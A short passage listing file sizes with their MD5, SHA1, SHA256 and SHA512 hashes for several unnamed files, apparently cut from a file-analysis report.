SHA256ba06a6ee0b15f5be5c4e67782eec8b521e36c107a329093ec400fe0404eb196a
SHA512fbb446f4a27ef510e616caad52945d6c9cc1fd063812c41947e579ec2b54df57c6dc46237ded80fca5847f38cbe1747a6c66a13e2c8c19c664a72be35eb8b040
-
Filesize
2.0MB
MD51cc453cdf74f31e4d913ff9c10acdde2
SHA16e85eae544d6e965f15fa5c39700fa7202f3aafe
SHA256ac5c92fe6c51cfa742e475215b83b3e11a4379820043263bf50d4068686c6fa5
SHA512dd9ff4e06b00dc831439bab11c10e9b2ae864ea6e780d3835ea7468818f35439f352ef137da111efcdf2bb6465f6ca486719451bf6cf32c6a4420a56b1d64571
-
Filesize
310KB
MD59bf8ec9df67ed11334f2d7a797324107
SHA1bb6e2f05bd01361503c0eb4712c1d9df8978d4ae
SHA2562371cd711da18555d6f4798131216cee00af960b59beaf8522ca9917b922a3dc
SHA51265d0f45d3fcc598fac2811df9acb2c6ec55ee98a9782825730637b5cd1f65815b6334b6a680dbfaf9fd7f71280eaee6a4d081199cddc0a971c8544a53e200edf
-
Filesize
4.6MB
MD5397926927bca55be4a77839b1c44de6e
SHA1e10f3434ef3021c399dbba047832f02b3c898dbd
SHA2564f07e1095cc915b2d46eb149d1c3be14f3f4b4bd2742517265947fd23bdca5a7
SHA512cf54136b977fc8af7e8746d78676d0d464362a8cfa2213e392487003b5034562ee802e6911760b98a847bddd36ad664f32d849af84d7e208d4648bd97a2fa954